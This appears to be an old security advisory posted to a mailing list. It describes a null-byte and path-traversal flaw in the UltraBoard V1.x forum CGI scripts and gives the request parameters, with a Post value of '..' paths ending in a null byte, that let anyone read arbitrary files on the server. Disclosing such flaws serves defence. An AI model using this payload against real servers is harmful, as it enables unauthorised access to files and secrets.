hola friends,

found some interesting things in the "old" UltraBoard-Forum scripts
(UltraBoard V 1.6)

class:Input Validation Error
remote:Yes
vulnerable:UltraBoard V1.*
vendor: www.ultrascripts.com || www.ub2k.com

Description:
By using the good old NullByte(\000) its possible to open "any" file on the
webserver(with its permissions) running the "UltraBoard" forum-software.

cgi-script:
UltraBoard.pl || UltraBoard.cgi

Variables:
Action=PrintableTopic
Post=[path_including_".."_to_any_file][***NULLBYTE***]
Board=[valid_board]
Idle=10
Sort=0
Order=Descend
Page=0
Session=


RC-EOF